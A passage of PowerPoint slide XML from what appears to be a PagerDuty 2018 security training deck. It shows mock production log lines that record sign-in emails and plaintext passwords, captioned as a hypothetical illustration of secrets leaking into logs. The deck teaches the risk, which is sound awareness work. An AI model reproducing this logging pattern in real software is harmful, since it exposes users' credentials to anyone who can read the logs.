                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You will not get into trouble!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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369" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="336020" y="10956396"/>
            <a:ext cx="23711960" cy="2776538"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23711958" cy="2776536"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1367" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1506536"/>
              <a:ext cx="23711959" cy="127000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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1368" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19579" y="0"/>
              <a:ext cx="23672801" cy="1558106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="16513">
                  <a:srgbClr val="FFFFFF"/>
                </a:gs>
                <a:gs pos="72171">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="shape">
                <a:fillToRect l="50061" t="105303" r="49938" b="-5303"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1370" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C151"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1377" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="500225" y="1862666"/>
            <a:ext cx="23383549" cy="1430868"/>
            <a:chOff x="0" y="376237"/>
            <a:chExt cx="23383547" cy="1430866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1374" name="I, [2018-04-10T22:40:26.379647 #14566]  INFO -- : [X-Request-Id: 82a6c040-a552-4ea4-a524-ee32f8f8cf27] [Customer-Name: rich-super-awesome-account]   Parameters: {&quot;utf8&quot;=&gt;&quot;✓&quot;, &quot;authenticity_token&quot;=&gt;&quot;5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8&quot;, &quot;user&quot;=&gt;{&quot;ema"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="376237"/>
              <a:ext cx="2338354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000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>I, [2018-04-10T22:40:26.379647 #14566]  INFO -- : [X-Request-Id: 82a6c040-a552-4ea4-a524-ee32f8f8cf27] [Customer-Name: rich-super-awesome-account]   Parameters: {"utf8"=&gt;"✓", "authenticity_token"=&gt;"5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8", "user"=&gt;{"email"=&gt;"rich@pagerduty.com", "password"=&gt;"bluellama", "remember_me"=&gt;"1"}, "commit"=&gt;"Sign In"}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1375" name="host= prod-web-app-fb655ea3 | source= /pagerduty/logs/production.log | sourcetype= ruby"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1112837"/>
              <a:ext cx="2338354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sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>host= </a:t>
              </a:r>
              <a:r>
                <a:t>prod-web-app-fb655ea3 </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| source=</a:t>
              </a:r>
              <a:r>
                <a:t> /pagerduty/logs/production.log </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| sourcetype=</a:t>
              </a:r>
              <a:r>
                <a:t> ruby</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1376" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1807104"/>
              <a:ext cx="23383549" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="DCDEE0"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1378" name="This is a hypothetical example, you’ll be pleased to know we do actually redact secrets before they get written to our logs."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10095577" y="12946240"/>
            <a:ext cx="13752910"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defTabSz="584200">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is a hypothetical example, you’ll be pleased to know we do actually redact secrets before they get written to our logs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1382" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="500225" y="4148666"/>
            <a:ext cx="23383549" cy="1430868"/>
            <a:chOff x="0" y="528637"/>
            <a:chExt cx="23383547" cy="1430866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1379" name="I, [2018-04-10T22:41:14.345676 #54858]  INFO -- : [X-Request-Id: 7ee95481-00d2-4ba5-a670-2517b115e5ad] [Customer-Name: super-large-enterprise-customer]   Parameters: {&quot;utf8&quot;=&gt;&quot;✓&quot;, &quot;authenticity_token&quot;=&gt;&quot;972A13CBBE5E845ECB59DACE8E3ECE01450D33F4&quot;, &quot;user&quot;=&gt;"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="528637"/>
              <a:ext cx="2338354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000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>I, [2018-04-10T22:41:14.345676 #54858]  INFO -- : [X-Request-Id: 7ee95481-00d2-4ba5-a670-2517b115e5ad] [Customer-Name: super-large-enterprise-customer]   Parameters: {"utf8"=&gt;"✓", "authenticity_token"=&gt;"972A13CBBE5E845ECB59DACE8E3ECE01450D33F4", "user"=&gt;{"email"=&gt;"billgates@microsoft.com", "password"=&gt;"windowsxp-was-the-best", "remember_me"=&gt;"1"}, "commit"=&gt;"Sign In"}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1380" name="host= prod-web-app-ab617639 | source= /pagerduty/logs/production.log | sourcetype= ruby"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1265237"/>
              <a:ext cx="2338354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sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>host= </a:t>
              </a:r>
              <a:r>
                <a:t>prod-web-app-ab617639 </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| source=</a:t>
              </a:r>
              <a:r>
                <a:t> /pagerduty/logs/production.log </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| sourcetype=</a:t>
              </a:r>
              <a:r>
                <a:t> ruby</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1381" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1959504"/>
              <a:ext cx="23383549" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="DCDEE0"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1386" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="500225" y="6434666"/>
            <a:ext cx="23383549" cy="1430868"/>
            <a:chOff x="0" y="528637"/>
            <a:chExt cx="23383547" cy="1430866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1383" name="I, [2018-04-10T22:41:14.786543 #36541]  INFO -- : [X-Request-Id: e1ecd16e-50e9-4d27-9236-4c5642fc929c] [Customer-Name: small-startup]   Parameters: {&quot;utf8&quot;=&gt;&quot;✓&quot;, &quot;authenticity_token&quot;=&gt;&quot;343AFB87DF4A1287422394441FC1D97FEB04370F&quot;, &quot;user&quot;=&gt;{&quot;email&quot;=&gt;&quot;hi@twit"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="528637"/>
              <a:ext cx="2338354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000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>I, [2018-04-10T22:41:14.786543 #36541]  INFO -- : [X-Request-Id: e1ecd16e-50e9-4d27-9236-4c5642fc929c] [Customer-Name: small-startup]   Parameters: {"utf8"=&gt;"✓", "authenticity_token"=&gt;"343AFB87DF4A1287422394441FC1D97FEB04370F", "user"=&gt;{"email"=&gt;"hi@twitterforpets.com", "password"=&gt;"o0OitbeQHfCfHq1QeDuEY", "remember_me"=&gt;"1"}, "commit"=&gt;"Sign In"}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1384" name="host= prod-web-app-ffe6dbac | source= /pagerduty/logs/production.log | sourcetype= ruby"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1265237"/>
              <a:ext cx="2338354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sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>host= </a:t>
              </a:r>
              <a:r>
                <a:t>prod-web-app-ffe6dbac </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| source=</a:t>
              </a:r>
              <a:r>
                <a:t> /pagerduty/logs/production.log </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| sourcetype=</a:t>
              </a:r>
              <a:r>
                <a:t> ruby</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1385" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1959504"/>
              <a:ext cx="23383549" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="DCDEE0"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1390" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="500225" y="8720666"/>
            <a:ext cx="23383549" cy="1430868"/>
            <a:chOff x="0" y="528637"/>
            <a:chExt cx="23383547" cy="1430866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1387" name="I, [2018-04-10T22:42:01.000256 #19725]  INFO -- : [X-Request-Id: 2a97e0d6-9248-43e0-9ec6-66fe01ceebe2] [Customer-Name: internal-pagerduty-account]   Parameters: {&quot;utf8&quot;=&gt;&quot;✓&quot;, &quot;authenticity_token&quot;=&gt;&quot;B47F363E2B430C0647F14DEEA3ECED9B0EF300CE&quot;, &quot;user&quot;=&gt;{&quot;ema"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="528637"/>
              <a:ext cx="2338354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000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>I, [2018-04-10T22:42:01.000256 #19725]  INFO -- : [X-Request-Id: 2a97e0d6-9248-43e0-9ec6-66fe01ceebe2] [Customer-Name: internal-pagerduty-account]   Parameters: {"utf8"=&gt;"✓", "authenticity_token"=&gt;"B47F363E2B430C0647F14DEEA3ECED9B0EF300CE", "user"=&gt;{"email"=&gt;"rich@pagerduty.com", "password"=&gt;"\i{/"?4{!o96zo+~:TCid`VH[`}3Cj8D8*Jw$4aw36h@x7hGh6+Di9xTLIf]u2C", "remember_me"=&gt;"1"}, "commit"=&gt;"Sign In"}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1388" name="host= prod-web-app-671cdb1a | source= /pagerduty/logs/production.log | sourcetype= ruby"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1265237"/>
              <a:ext cx="2338354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sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>host= </a:t>
              </a:r>
              <a:r>
                <a:t>prod-web-app-671cdb1a </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| source=</a:t>
              </a:r>
              <a:r>
                <a:t> /pagerduty/logs/production.log </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| sourcetype=</a:t>
              </a:r>
              <a:r>
                <a:t> ruby</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1389" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1959504"/>
              <a:ext cx="23383549" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="DCDEE0"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1394" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="500225" y="11006666"/>
            <a:ext cx="23383549" cy="1430868"/>
            <a:chOff x="0" y="376237"/>
            <a:chExt cx="23383547" cy="1430866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1391" name="I, [2018-04-10T22:42:05.765391 #69475]  INFO -- : [X-Request-Id: 3253b841-57dc-4094-8fa6-39b07f9c2858] [Customer-Name: spiderman]   Parameters: {&quot;utf8&quot;=&gt;&quot;✓&quot;, &quot;authenticity_token&quot;=&gt;&quot;03D67C263C27A453EF65B29E30334727333CCBCD&quot;, &quot;user&quot;=&gt;{&quot;email&quot;=&gt;&quot;pparker@spi"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="376237"/>
              <a:ext cx="2338354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2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>I, [2018-04-10T22:42:05.765391 #69475]  INFO -- : [X-Request-Id: 3253b841-57dc-4094-8fa6-39b07f9c2858] [Customer-Name: spiderman]   Parameters: {"utf8"=&gt;"✓", "authenticity_token"=&gt;"03D67C263C27A453EF65B29E30334727333CCBCD", "user"=&gt;{"email"=&gt;"pparker@spiderman.net", "password"=&gt;"venom", "remember_me"=&gt;"1"}, "commit"=&gt;"Sign In"}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1392" name="host= prod-web-app-fb655ea3 | source= /pagerduty/logs/production.log | sourcetype= ruby"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1112837"/>
              <a:ext cx="2338354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sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>host= </a:t>
              </a:r>
              <a:r>
                <a:t>prod-web-app-fb655ea3 </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| source=</a:t>
              </a:r>
              <a:r>
                <a:t> /pagerduty/logs/production.log </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="A7AAA9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>| sourcetype=</a:t>
              </a:r>
              <a:r>
                <a:t> ruby</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1393" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1807104"/>
              <a:ext cx="23383549" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="DCDEE0"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>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5C15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50000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
